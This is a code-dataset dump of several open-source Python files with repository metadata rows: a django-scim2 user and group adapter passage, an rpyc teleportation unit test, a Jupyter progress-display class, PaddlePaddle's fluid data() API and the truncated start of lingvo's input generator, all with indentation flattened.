"""
Return new paths and values given original paths and values.
This method can be overridden to provide a more usable path and value
within the associated handle methods.
"""
paths_and_values = []
# Convert all path's to AttrPath objects in preparation for
# use of scim2-filter-parser. Complex paths can path through as the
# logic to handle them is not in place yet.
if not path:
if not isinstance(value, dict):
raise ValueError('No path and operation value is a non-dict. Can not determine attribute.')
# If there is no path and value is a dict, we assume that each
# key in the dict is an attribute path. Let's convert attribute
# paths to AttrPath objects to have a uniform API.
for path, value in value.items():
new_path = self.split_path(path)
new_value = value
paths_and_values.append((new_path, new_value))
else:
new_path = self.split_path(path)
new_value = value
paths_and_values.append((new_path, new_value))
return paths_and_values
def split_path(self, path: str) -> AttrPath:
"""
Convert string path to an AttrPath object if possible.
An AttrPath can be complex. Eg::
- "addresses[type eq "work"]"
- "members[value eq "123"].displayName"
- "emails[type eq "work" and value co "@example.com"].value"
It's up to the handlers to reject, ignore, handle requests with
these types of paths. Handling them is above and beyond what
the maintainer has time for.
"""
# AttrPath requires a complete filter query. Thus we tack on
# ' eq ""' to path to make a complete SCIM query.
filter_ = path + ' eq ""'
attr_path = AttrPath(filter_, self.ATTR_MAP)
if not list(attr_path):
msg = 'No attribute path found in request'
raise exceptions.BadRequestError(msg)
return attr_path
def handle_add(self,
path: AttrPath,
value: Union[str, list, dict],
operation: dict):
"""
Handle add operations per:
https://tools.ietf.org/html/rfc7644#section-3.5.2.1
"""
raise exceptions.NotImplementedError
def handle_remove(self,
path: AttrPath,
value: Union[str, list, dict],
operation: dict):
"""
Handle remove operations per:
https://tools.ietf.org/html/rfc7644#section-3.5.2.2
"""
raise exceptions.NotImplementedError
def handle_replace(self,
path: AttrPath,
value: Union[str, list, dict],
operation: dict):
"""
Handle replace operations per:
https://tools.ietf.org/html/rfc7644#section-3.5.2.3
"""
raise exceptions.NotImplementedError
class SCIMUser(SCIMMixin):
"""
Adapter for adding SCIM functionality to a Django User object.
This adapter can be overridden; see the ``USER_ADAPTER`` setting
for details.
"""
# not great, could be more decoupled. But \__( )__/ whatevs.
url_name = 'scim:users'
resource_type = 'User'
ATTR_MAP = get_user_filter_parser().attr_map
@property
def display_name(self):
"""
Return the displayName of the user per the SCIM spec.
"""
if self.obj.first_name and self.obj.last_name:
return u'{0.first_name} {0.last_name}'.format(self.obj)
return self.obj.username
@property
def name_formatted(self):
return self.display_name
@property
def emails(self):
"""
Return the email of the user per the SCIM spec.
"""
return [{'value': self.obj.email, 'primary': True}]
@property
def groups(self):
"""
Return the groups of the user per the SCIM spec.
"""
group_qs = self.obj.scim_groups.all()
scim_groups = [get_group_adapter()(g, self.request) for g in group_qs]
dicts = []
for group in scim_groups:
d = {
'value': group.id,
'$ref': group.location,
'display': group.display_name,
}
dicts.append(d)
return dicts
@property
def meta(self):
"""
Return the meta object of the user per the SCIM spec.
"""
d = {
'resourceType': self.resource_type,
'created': self.obj.date_joined.isoformat(),
'lastModified': self.obj.date_joined.isoformat(),
'location': self.location,
}
return d
def to_dict(self):
"""
Return a ``dict`` conforming to the SCIM User Schema,
ready for conversion to a JSON object.
"""
d = super().to_dict()
d.update({
'schemas': [constants.SchemaURI.USER],
'userName': self.obj.username,
'name': {
'givenName': self.obj.first_name,
'familyName': self.obj.last_name,
'formatted': self.name_formatted,
},
'displayName': self.display_name,
'emails': self.emails,
'active': self.obj.is_active,
'groups': self.groups,
'meta': self.meta,
})
return d
def from_dict(self, d):
"""
Consume a ``dict`` conforming to the SCIM User Schema, updating the
internal user object with data from the ``dict``.
Please note, the user object is not saved within this method. To
persist the changes made by this method, please call ``.save()`` on the
adapter. Eg::
scim_user.from_dict(d)
scim_user.save()
"""
super().from_dict(d)
username = d.get('userName')
self.obj.username = username or ''
self.obj.scim_username = self.obj.username
first_name = d.get('name', {}).get('givenName')
self.obj.first_name = first_name or ''
last_name = d.get('name', {}).get('familyName')
self.obj.last_name = last_name or ''
emails = d.get('emails', [])
self.parse_emails(emails)
cleartext_password = d.get('password')
if cleartext_password:
self.obj.set_password(cleartext_password)
active = d.get('active')
if active is not None:
self.obj.is_active = active
@classmethod
def resource_type_dict(cls, request=None):
"""
Return a ``dict`` containing ResourceType metadata for the user object.
"""
id_ = cls.resource_type
path = reverse('scim:resource-types', kwargs={'uuid': id_})
location = urljoin(get_base_scim_location_getter()(request), path)
return {
'schemas': [constants.SchemaURI.RESOURCE_TYPE],
'id': id_,
'name': 'User',
'endpoint': reverse('scim:users'),
'description': 'User Account',
'schema': constants.SchemaURI.USER,
'meta': {
'location': location,
'resourceType': 'ResourceType'
}
}
def parse_emails(self, value: Optional[list]):
if value:
email = None
if isinstance(value, list):
primary_emails = sorted(
(e for e in value if e.get('primary')),
key=lambda d: d.get('value')
)
secondary_emails = sorted(
(e for e in value if not e.get('primary')),
key=lambda d: d.get('value')
)
emails = primary_emails + secondary_emails
if emails:
email = emails[0].get('value')
else:
raise exceptions.BadRequestError('Invalid email value')
elif isinstance(value, dict):
# if value is a dict, let's assume it contains the primary email.
# OneLogin sends a dict despite the spec:
# https://tools.ietf.org/html/rfc7643#section-4.1.2
# https://tools.ietf.org/html/rfc7643#section-8.2
email = (value.get('value') or '').strip()
self.validate_email(email)
self.obj.email = email
@staticmethod
def validate_email(email):
try:
core.validators.EmailValidator()(email)
except core.exceptions.ValidationError:
raise exceptions.BadRequestError('Invalid email value')
def handle_replace(self,
path: Optional[AttrPath],
value: Union[str, list, dict],
operation: dict):
"""
Handle the replace operations.
"""
if not isinstance(value, dict):
# Restructure for use in loop below.
value = {path: value}
if not isinstance(value, dict):
raise exceptions.NotImplementedError(
f'PATCH replace operation with value type of '
f'{type(value)} is not implemented'
)
for path, value in (value or {}).items():
if path.first_path in self.ATTR_MAP:
setattr(self.obj, self.ATTR_MAP.get(path.first_path), value)
elif path.first_path == ('emails', None, None):
self.parse_emails(value)
else:
raise exceptions.NotImplementedError('Not Implemented')
self.save()
class SCIMGroup(SCIMMixin):
"""
Adapter for adding SCIM functionality to a Django Group object.
This adapter can be overridden; see the ``GROUP_ADAPTER``
setting for details.
"""
# not great, could be more decoupled. But \__( )__/ whatevs.
url_name = 'scim:groups'
resource_type = 'Group'
ATTR_MAP = get_group_filter_parser().attr_map
@property
def display_name(self):
"""
Return the displayName of the group per the SCIM spec.
"""
return self.obj.name
@property
def members(self):
"""
Return a list of user dicts (ready for serialization) for the members
of the group.
:rtype: list
"""
users = self.obj.user_set.all()
scim_users = [get_user_adapter()(user, self.request) for user in users]
dicts = []
for user in scim_users:
d = {
'value': user.id,
'$ref': user.location,
'display': user.display_name,
}
dicts.append(d)
return dicts
@property
def meta(self):
"""
Return the meta object of the group per the SCIM spec.
"""
d = {
'resourceType': self.resource_type,
'location': self.location,
}
return d
def to_dict(self):
"""
Return a ``dict`` conforming to the SCIM Group Schema,
ready for conversion to a JSON object.
"""
d = super().to_dict()
d.update({
'schemas': [constants.SchemaURI.GROUP],
'displayName': self.display_name,
'members': self.members,
'meta': self.meta,
})
return d
def from_dict(self, d):
"""
Consume a ``dict`` conforming to the SCIM Group Schema, updating the
internal group object with data from the ``dict``.
Please note, the group object is not saved within this method. To
persist the changes made by this method, please call ``.save()`` on the
adapter. Eg::
scim_group.from_dict(d)
scim_group.save()
"""
super().from_dict(d)
name = d.get('displayName')
self.obj.name = name or ''
@classmethod
def resource_type_dict(cls, request=None):
"""
Return a ``dict`` containing ResourceType metadata for the group object.
"""
id_ = cls.resource_type
path = reverse('scim:resource-types', kwargs={'uuid': id_})
location = urljoin(get_base_scim_location_getter()(request), path)
return {
'schemas': [constants.SchemaURI.RESOURCE_TYPE],
'id': id_,
'name': 'Group',
'endpoint': reverse('scim:groups'),
'description': 'Group',
'schema': constants.SchemaURI.GROUP,
'meta': {
'location': location,
'resourceType': 'ResourceType'
}
}
def handle_add(self, path, value, operation):
"""
Handle add operations.
"""
if path.first_path == ('members', None, None):
members = value or []
ids = [int(member.get('value')) for member in members]
users = get_user_model().objects.filter(id__in=ids)
if len(ids) != users.count():
raise exceptions.BadRequestError('Can not add a non-existent user to group')
for user in users:
self.obj.user_set.add(user)
else:
raise exceptions.NotImplementedError
def handle_remove(self, path, value, operation):
"""
Handle remove operations.
"""
if path.first_path == ('members', None, None):
members = value or []
ids = [int(member.get('value')) for member in members]
users = get_user_model().objects.filter(id__in=ids)
if len(ids) != users.count():
raise exceptions.BadRequestError('Can not remove a non-existent user from group')
for user in users:
self.obj.user_set.remove(user)
else:
raise exceptions.NotImplementedError
def handle_replace(self, path, value, operation):
"""
Handle the replace operations.
"""
if path.first_path == ('name', None, None):
name = value[0].get('value')
self.obj.name = name
self.save()
else:
raise exceptions.NotImplementedError
| 32.841463
| 107
| 0.569393
|
4a15b52b0d4ac478c42a07f7862d9b09160dfbe8
| 4,828
|
py
|
Python
|
tests/test_teleportation.py
|
pdxjohnny/rpyc
|
bc8f0223be8436fa77c71cda94cc6610d621a364
|
[
"MIT"
] | 238
|
2020-09-02T22:26:44.000Z
|
2022-03-31T17:49:55.000Z
|
tests/test_teleportation.py
|
pdxjohnny/rpyc
|
bc8f0223be8436fa77c71cda94cc6610d621a364
|
[
"MIT"
] | 87
|
2020-09-02T20:10:35.000Z
|
2022-03-16T16:49:47.000Z
|
tests/test_teleportation.py
|
pdxjohnny/rpyc
|
bc8f0223be8436fa77c71cda94cc6610d621a364
|
[
"MIT"
] | 40
|
2020-09-13T19:53:51.000Z
|
2022-03-21T09:17:48.000Z
|
from __future__ import with_statement
import subprocess
import sys
import os
import rpyc
import types
import unittest
import tracemalloc
tracemalloc.start()
from rpyc.utils.teleportation import export_function, import_function
from rpyc.lib.compat import is_py_3k, is_py_gte38
from rpyc.utils.classic import teleport_function
def b(st):
if sys.version_info[0] >= 3:
return bytes(st, "latin-1")
else:
return st
def f(a):
def g(b):
return a + int(b)
return g
def defaults(a=5, b="hi", c=(5.5, )):
return a, b, c
def kwdefaults(pos=5, *, a=42, b="bye", c=(12.4, )):
return pos, a, b, c
def h(a):
import os
return a * os.getpid()
def foo():
return bar() + 1
def bar():
return 42
class TeleportationTest(unittest.TestCase):
def setUp(self):
server_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "bin", "rpyc_classic.py")
self.proc = subprocess.Popen([sys.executable, server_file, "--mode=oneshot", "--host=localhost", "-p0"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
line = self.proc.stdout.readline().strip()
if not line:
print(self.proc.stderr.read())
self.fail("server failed to start")
self.assertEqual(line, b("rpyc-oneshot"), "server failed to start")
host, port = self.proc.stdout.readline().strip().split(b("\t"))
self.conn = rpyc.classic.connect(host, int(port))
def tearDown(self):
self.conn.close()
self.proc.communicate() # clear io so resources are closed
def test(self):
exp = export_function(f)
f2 = import_function(exp)
self.assertEqual(f(6)(7), f2(6)(7))
h2 = teleport_function(self.conn, h)
self.assertNotEqual(h(7), h2(7))
def test_globals(self):
def the_answer():
return THE_ANSWER # noqa
teleported = teleport_function(self.conn, the_answer)
self.conn.namespace['THE_ANSWER'] = 42
self.assertEqual(teleported(), 42)
the_globals = self.conn.builtins.dict({'THE_ANSWER': 43})
teleported2 = teleport_function(self.conn, the_answer, the_globals)
self.assertEqual(teleported2(), 43)
def test_def(self):
foo_ = teleport_function(self.conn, foo)
bar_ = teleport_function(self.conn, bar)
self.assertEqual(foo_(), 43)
self.assertEqual(bar_(), 42)
def test_defaults(self):
defaults_ = teleport_function(self.conn, defaults)
self.assertEqual(defaults_(), defaults())
def test_kwdefaults(self):
kwdefaults_ = teleport_function(self.conn, kwdefaults)
self.assertEqual(kwdefaults_(), kwdefaults())
def test_compat(self): # assumes func has only brineable types
def get37_schema(cobj):
return (cobj.co_argcount, 0, cobj.co_nlocals, cobj.co_stacksize,
cobj.co_flags, cobj.co_code, cobj.co_consts, cobj.co_names, cobj.co_varnames,
cobj.co_filename, cobj.co_name, cobj.co_firstlineno, cobj.co_lnotab,
cobj.co_freevars, cobj.co_cellvars)
def get38_schema(cobj):
return (cobj.co_argcount, 2, cobj.co_kwonlyargcount, cobj.co_nlocals,
cobj.co_stacksize, cobj.co_flags, cobj.co_code, cobj.co_consts, cobj.co_names,
cobj.co_varnames, cobj.co_filename, cobj.co_name, cobj.co_firstlineno, cobj.co_lnotab,
cobj.co_freevars, cobj.co_cellvars)
if is_py_3k:
pow37 = lambda x, y : x ** y # noqa
pow38 = lambda x, y : x ** y # noqa
export37 = get37_schema(pow37.__code__)
export38 = get38_schema(pow38.__code__)
schema37 = (pow37.__name__, pow37.__module__, pow37.__defaults__, pow37.__kwdefaults__, export37)
schema38 = (pow38.__name__, pow38.__module__, pow38.__defaults__, pow38.__kwdefaults__, export38)
pow37_netref = self.conn.modules["rpyc.utils.teleportation"].import_function(schema37)
pow38_netref = self.conn.modules["rpyc.utils.teleportation"].import_function(schema38)
self.assertEqual(pow37_netref(2, 3), pow37(2, 3))
self.assertEqual(pow38_netref(2, 3), pow38(2, 3))
self.assertEqual(pow37_netref(x=2, y=3), pow37(x=2, y=3))
if not is_py_gte38:
return # skip remained of tests for 3.7
pow38.__code__ = types.CodeType(*export38) # pow38 = lambda x, y, /: x ** y
with self.assertRaises(TypeError): # show local behavior
pow38(x=2, y=3)
with self.assertRaises(TypeError):
pow38_netref(x=2, y=3)
if __name__ == "__main__":
unittest.main()
| 34.985507
| 112
| 0.627589
|
4a15b577297a1cc185f582d54ce7977e7b496db1
| 9,458
|
py
|
Python
|
MassiveDisplay.py
|
Dahk/serverless_func_display
|
ecdd687a993323911461c04b381e73d7591c7a01
|
[
"MIT"
] | null | null | null |
MassiveDisplay.py
|
Dahk/serverless_func_display
|
ecdd687a993323911461c04b381e73d7591c7a01
|
[
"MIT"
] | null | null | null |
MassiveDisplay.py
|
Dahk/serverless_func_display
|
ecdd687a993323911461c04b381e73d7591c7a01
|
[
"MIT"
] | null | null | null |
from IPython.display import display, HTML, Javascript
import math, time
class MassiveDisplay():
def __init__(self, idlist):
self.progressTracker = {
bar_id : 0
for bar_id in idlist
}
self.metrics_max = 5
self.count = len(idlist)
self.stages = [self.count, 0, 0, 0]
self.end_stage = len(self.stages)-1
self.slowest_per_stage = [0, 0, 0]
self.frame_delay = 1
self.frame_start = 0
self.update_scale = False
self.render_buffer = ''
self.css = """
<style>
.upper-bars {
display: grid;
grid-template-rows: repeat({NUM_ROWS}, 6px);
grid-template-columns: repeat({NUM_COLS}, 1fr);
background-color: #EEE;
border: 0;
border-radius: 12px;
position: relative;
box-shadow: 0 75px 125px -57px #7e8f94;
padding: 4px;
}
.gantt-row-bars {
display: grid;
grid-template-columns: repeat(100, 1fr);
grid-template-rows: auto;
margin-bottom: 1px;
margin-top: 1px;
position: relative;
background-color: #C0C5CE;
border-radius: 14px;
width: auto;
margin-left: 3px;
margin-right: 3px;
}
.gantt-row-bars > div {
background-color: #3aabe8;
color: #fff;
border-radius: 14px;
}
.stages {
display: grid;
position: relative;
background-color: #EEE;
border: 0;
border-radius: 12px;
box-shadow: 0 75px 125px -57px #7e8f94;
margin: 10px 20%;
height: 325px;
padding: 15px 0px;
}
.stage-bar {
display: grid;
grid-template-columns: repeat({NUM_WORKERS}, 1fr);
grid-template-rows: auto;
position: relative;
background-color: #D1D6DF;
border-radius: 10px;
width: auto;
margin: 15px 25px;
padding: 1px 1px;
}
.stage-bar > span {
position: absolute;
z-index: 1;
left: 50%;
margin-left: -10%;
top: 30%;
font-weight: bold;
font-size: 16px;
font-family: sans-serif;
color: #FFF;
text-shadow: 0.5px 0.5px 0 #333;
}
.stage-bar > div {
color: #fff;
border-radius: 10px;
position: relative;
height: 100%;
}
</style>
"""
self.html_row_template = """
<div id="row_id_{ID}" class="gantt-row-bars" style="grid-column: {COL}; grid-row: {ROW};">
<div id="bar_id_{ID}" style="grid-column: 1; display: none"></div>
</div>
"""
self.html_template = """
<div style="background-color: #cddade; padding: 30px;">
<div class="upper-bars">
{ROWS}
</div>
<div class="stages">
<div class="stage-bar">
<span style="left: 0; margin-left: 5px;">Fetching</span>
<span id="stage0-text">{NUM_WORKERS}/{NUM_WORKERS} (100%)</span>
<span id="stage0-timestamp" style="left: 97.5%;"></span>
<div id="stage0-bar" style="grid-column: 1/{NUM_WORKERS_PLUS1}; background-color: #034561;"></div>
</div>
<div class="stage-bar">
<span style="left: 0; margin-left: 5px;">Processing</span>
<span id="stage1-text">0/{NUM_WORKERS} (0%)</span>
<span id="stage1-timestamp" style="left: 97.5%;"></span>
<div id="stage1-bar" style="grid-column: 1/1; display: none; background-color: #409d9b;"></div>
</div>
<div class="stage-bar">
<span style="left: 0; margin-left: 5px;">Uploading results</span>
<span id="stage2-text">0/{NUM_WORKERS} (0%)</span>
<span id="stage2-timestamp" style="left: 97.5%;"></span>
<div id="stage2-bar" style="grid-column: 1/1; display: none; background-color: #4fb783;"></div>
</div>
<div class="stage-bar">
<span style="left: 0; margin-left: 5px;">Finished</span>
<span id="stage3-text">0/{NUM_WORKERS} (0%)</span>
<span id="stage3-timestamp" style="left: 97.5%;"></span>
<div id="stage3-bar" style="grid-column: 1/1; display: none; background-color: #8cd154;"></div>
</div>
</div>
</div>
"""
self.js_update_bar = """
var elem = document.getElementById("bar_id_{ID}")
var part = {PART}
elem.style.gridColumn = "1/" + part
if (part > 1) elem.style.display = "block"
"""
self.js_complete_bar = """
var elem = document.getElementById("bar_id_{ID}")
elem.style.backgroundColor = "#1abc9c"
"""
self.js_update_stage = """
var elem = document.getElementById("stage{STAGE}-bar")
var part = {PART}
if (part){
elem.style.gridColumn = "1/" + (part+1)
elem.style.display = "block"
} else
elem.style.display = "none"
elem = document.getElementById("stage{STAGE}-text")
elem.innerHTML = part + "/{NUM_WORKERS} (" + (part / {NUM_WORKERS} * 100).toFixed(2) + "%)"
""".replace('{NUM_WORKERS}', str(self.count))
self.js_update_timestamp = """
var elem = document.getElementById("stage{STAGE}-timestamp")
elem.innerHTML = "{TIME}s"
"""
def show(self):
num_rows = self.count
num_cols = 5
if num_rows > 1024:
num_cols = 10
elif num_rows > 512:
num_cols = 8
rows_per_col = math.trunc(num_rows / num_cols)
spare_rows = num_rows % num_cols
added_extra_row = 1 if spare_rows else 0
rows = ''
iter_ids = iter(self.progressTracker.keys())
for col in range(1, num_cols+1):
col_template = self.html_row_template.replace('{COL}', str(col))
for r in range(0, rows_per_col):
rows = rows + col_template.replace('{ID}', str(next(iter_ids))).replace('{ROW}', str(r+1))
if spare_rows:
rows = rows + col_template.replace('{ID}', str(next(iter_ids))).replace('{ROW}', str(rows_per_col+1))
spare_rows -= 1
html = self.html_template.replace('{ROWS}', rows)\
.replace('{NUM_WORKERS}', str(self.count)).replace('{NUM_WORKERS_PLUS1}', str(self.count+1))
css = self.css.replace('{NUM_ROWS}', str(rows_per_col+added_extra_row)).replace('{NUM_COLS}', str(num_cols))
display(HTML(html+css))
self.frame_start = time.time()
def update(self, bar_id, stage, progress, stage_complete=True):
if bar_id in self.progressTracker and not self.isDone():
self.progressTracker[bar_id] += progress
if self.progressTracker[bar_id] > self.metrics_max:
while self.progressTracker[bar_id] > self.metrics_max:
self.metrics_max *= 1.2
self.render_buffer = ''
self.update_scale = True
else:
self._update_bar(bar_id)
now = time.time()
if now - self.frame_start > self.frame_delay:
self._refresh()
self.frame_start = now
if stage_complete:
self._update_stages(stage)
if stage+1 == self.end_stage:
self.complete(bar_id)
if self.progressTracker[bar_id] > self.slowest_per_stage[stage]:
self.slowest_per_stage[stage] = self.progressTracker[bar_id]
if self.stages[stage] == 0:
self._update_timestamp(stage, self.slowest_per_stage[stage])
def _update_bar(self, bar_id):
part = math.floor(self.progressTracker[bar_id] / self.metrics_max * 100 + 1)
render = self.js_update_bar.replace('{ID}', str(bar_id)).replace('{PART}', str(part))
self.render_buffer += render
def _refresh(self):
if self.update_scale:
for bar_id in self.progressTracker.keys():
self._update_bar(bar_id)
self.update_scale = False
display(Javascript(self.render_buffer))
self.render_buffer = ''
def _update_stages(self, stage):
self.stages[stage] -= 1
self.stages[stage+1] += 1
render = self.js_update_stage.replace('{STAGE}', str(stage)).replace('{PART}', str(self.stages[stage]))
render += self.js_update_stage.replace('{STAGE}', str(stage+1)).replace('{PART}', str(self.stages[stage+1]))
display(Javascript(render))
def _update_timestamp(self, stage, time):
render = self.js_update_timestamp.replace('{STAGE}', str(stage)).replace('{TIME}', str(round(time, 2)))
display(Javascript(render))
def complete(self, bar_id):
if bar_id in self.progressTracker and not self.isDone():
self.count -= 1
render = self.js_complete_bar.replace('{ID}', str(bar_id))
display(Javascript(render))
def isDone(self):
return not self.count
| 38.762295
| 117
| 0.532882
|
4a15b6a8ea272be38d5158a660932dc4ae1d41a6
| 5,174
|
py
|
Python
|
python/paddle/fluid/data.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 11
|
2016-08-29T07:43:26.000Z
|
2016-08-29T07:51:24.000Z
|
python/paddle/fluid/data.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/data.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 1
|
2021-09-24T11:23:36.000Z
|
2021-09-24T11:23:36.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import six
from paddle.fluid import core
from paddle.fluid.layer_helper import LayerHelper
from paddle.fluid.data_feeder import check_dtype, check_type
from ..utils import deprecated
from paddle.fluid.framework import static_only
__all__ = ['data']
@static_only
@deprecated(since="2.0.0", update_to="paddle.static.data")
def data(name, shape, dtype='float32', lod_level=0):
"""
**Data Layer**
This function creates a variable on the global block. The global variable
can be accessed by all the following operators in the graph. The variable
is a placeholder that could be fed with input, such as Executor can feed
input into the variable.
Note:
`paddle.fluid.layers.data` is deprecated. It will be removed in a
future version. Please use this `paddle.fluid.data`.
The `paddle.fluid.layers.data` set shape and dtype at compile time but
does NOT check the shape or the dtype of fed data, this
`paddle.fluid.data` checks the shape and the dtype of data fed by
Executor or ParallelExecutor during run time.
To feed variable size inputs, users can set None or -1 on the variable
dimension when using :code:`paddle.fluid.data`, or feed variable size
inputs directly to :code:`paddle.fluid.layers.data` and PaddlePaddle
will fit the size accordingly.
The default :code:`stop_gradient` attribute of the Variable created by
this API is true, which means the gradient won't be passed backward
through the data Variable. Set :code:`var.stop_gradient = False` If
user would like to pass backward gradient.
Args:
name (str): The name/alias of the variable, see :ref:`api_guide_Name`
for more details.
shape (list|tuple): List|Tuple of integers declaring the shape. You can
set "None" or -1 at a dimension to indicate the dimension can be of any
size. For example, it is useful to set changeable batch size as "None" or -1.
dtype (np.dtype|VarType|str, optional): The type of the data. Supported
dtype: bool, float16, float32, float64, int8, int16, int32, int64,
uint8. Default: float32.
lod_level (int, optional): The LoD level of the LoDTensor. Usually users
don't have to set this value. For more details about when and how to
use LoD level, see :ref:`user_guide_lod_tensor` . Default: 0.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
paddle.enable_static()
# Creates a variable with fixed size [3, 2, 1]
# User can only feed data of the same shape to x
x = fluid.data(name='x', shape=[3, 2, 1], dtype='float32')
# Creates a variable with changeable batch size -1.
# Users can feed data of any batch size into y,
# but size of each data sample has to be [2, 1]
y = fluid.data(name='y', shape=[-1, 2, 1], dtype='float32')
z = x + y
# In this example, we will feed x and y with np-ndarray "1"
# and fetch z, like implementing "1 + 1 = 2" in PaddlePaddle
feed_data = np.ones(shape=[3, 2, 1], dtype=np.float32)
exe = fluid.Executor(fluid.CPUPlace())
out = exe.run(fluid.default_main_program(),
feed={
'x': feed_data,
'y': feed_data
},
fetch_list=[z.name])
# np-ndarray of shape=[3, 2, 1], dtype=float32, whose elements are 2
print(out)
"""
helper = LayerHelper('data', **locals())
check_type(name, 'name', (six.binary_type, six.text_type), 'data')
check_type(shape, 'shape', (list, tuple), 'data')
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
return helper.create_global_variable(name=name,
shape=shape,
dtype=dtype,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True,
lod_level=lod_level,
is_data=True,
need_check_feed=True)
| 41.063492
| 88
| 0.615578
|
4a15b7e474baa787cf3de9f43b361d0c88c31b7a
| 74,664
|
py
|
Python
|
lingvo/core/base_input_generator.py
|
slowy07/lingvo
|
f38f82541f2332571005a2d06b3badc9d48576d8
|
[
"Apache-2.0"
] | null | null | null |
lingvo/core/base_input_generator.py
|
slowy07/lingvo
|
f38f82541f2332571005a2d06b3badc9d48576d8
|
[
"Apache-2.0"
] | null | null | null |
lingvo/core/base_input_generator.py
|
slowy07/lingvo
|
f38f82541f2332571005a2d06b3badc9d48576d8
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Input generators.
There are three types of batch sizes:
* Device split batch size: Defined by Params() and is the batch size
on each device/TPU core. BaseInputGenerator.params.batch_size and
BaseSequenceInputGenerator.params.bucket_batch_limit specify per-split batch
size.
* GlobalBatchSize: number of examples in a global batch.
* InfeedBatchSize: global_batch_size // num_infeed_hosts, where
num_infeed_hosts is cluster.num_tpu_hosts if using per-host infeed with TPU,
otherwise num_infeed_hosts is 1.
TODO(rpang): Deal with on packed_inputs.
"""
import inspect
import lingvo.compat as tf
from lingvo.core import base_layer
from lingvo.core import batch_utils
from lingvo.core import cluster
from lingvo.core import cluster_factory
from lingvo.core import datasource
from lingvo.core import hyperparams
from lingvo.core import input_generator_helper as ig_helper
from lingvo.core import inspect_utils
from lingvo.core import ops
from lingvo.core import py_utils
from lingvo.core import tokenizers
from lingvo.core import tpu_embedding_layers
# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.ops import io_ops
from tensorflow.python.tpu import tpu_embedding as tpu_embedding_lib
from tensorflow.python.tpu import tpu_feed
# pylint: enable=g-direct-tensorflow-import
DEFAULT_TOKENIZER_KEY = 'default'
INPUT_DATA_STATS_SUMMARIES_COLLECTION = 'INPUT_DATA_STATS_SUMMARIES'
class BaseInputGenerator(base_layer.BaseLayer):
"""The abstract base input generator."""
@classmethod
def DefineInfeedParams(cls, p):
# TPU related infeed tuning.
# Supported use cases:
#
# Data parallelism (num_partitions=None)
# - single host (use_per_host_infeed=False, tpu_infeed_parallelism=1))
# - multi host (use_per_host_infeed=False, tpu_infeed_parallelism>1)
# - per host (use_per_host_infeed=True)
# - unsharded inputs (_InputBatch returns a single NestedMap)
# - sharded inputs (_InputBatch returns a list containing
# tpu_number_of_shards NestedMaps)
# Model parallelism (num_partitions>1 where)
# - non-partitioned infeed (use_partitioned_infeed_queue=False):
# - Only first partition gets infeed (e.g. manual partition)
# - single host (use_per_host_infeed=False)
# - per host (use_per_host_infeed=True)
# - All partitions gets data parallel infeed (e.g. MoE)
# - single host not supported
# - per host (use_per_host_infeed=True, use_per_core_infeed=True)
# num_partitions should be set to number of partitions per replica
# - partitioned infeed (use_partitioned_infeed_queue=True)
# - single host (use_per_host_infeed=False)
# - per host (use_per_host_infeed=True)
# num_partitions should be set to number of partitions per replica
# and all partitions should exist on a single host
p.Define('use_per_host_infeed', False,
'Whether run infeed op on each host.')
p.Define('use_per_core_infeed', False,
'Whether to shard the infeed per TPU core instead of per replica')
p.Define('tpu_infeed_parallelism', 1,
'Uses these many python threads to drive infeed concurrently.')
p.Define('use_partitioned_infeed_queue', False, 'Use partitioned infeed')
p.Define(
'num_partitions', None,
'Number of partitions to split the model graph into. Used with '
'model parallelism. When >1, it specifies the number of devices '
'used to place one replica of the model graph nodes.')
@classmethod
def Params(cls):
"""Defaults params for input generators."""
p = super().Params()
p.name = 'input'
p.Define(
'file_datasource', None,
'The DataSource that produces input batches for this input generator.')
p.Define(
'batch_size', 0, 'Batch size for a device split. This will be '
'scaled to match the accelarator hardware topology.')
p.Define(
'num_samples', 0,
'If non-zero, the dataset contains these many samples. '
'For test/eval dataset, if we want the test/evel job evaluate '
'the whole dataset, this param must be set precisely. Otherwise, '
'this param is optional.')
p.Define('resettable', False,
'If True, the input generator must implement Reset().')
# For an input generator to support samples_per_summary == 0 to indicate
# using the entire dataset, it must (1) be resettable, and (2) throws
# tf.errors.OutOfRangeError when reading a batch beyond an epoch.
p.Define(
'eval_samples_per_summary', None, 'If not None, overrides '
'task_p.eval.samples_per_summary directly. Allowed to be 0, which '
'means to use the entire dataset.')
p.Define(
'decoder_samples_per_summary', None, 'If not None, overrides '
'task_p.eval.decoder_samples_per_summary directly. Allowed to be 0, '
'which means to use the entire dataset.')
p.Define(
'filter_sparse_tensors', False,
'If true, filter out SparseTensors in input_batch before enqueuing '
'onto TPU.')
cls.DefineInfeedParams(p)
p.Define('remote', hyperparams.Params(),
'Params to configure remote input policy.')
p.remote.Define(
'max_inflights_per_target', 32, 'The maximum number of '
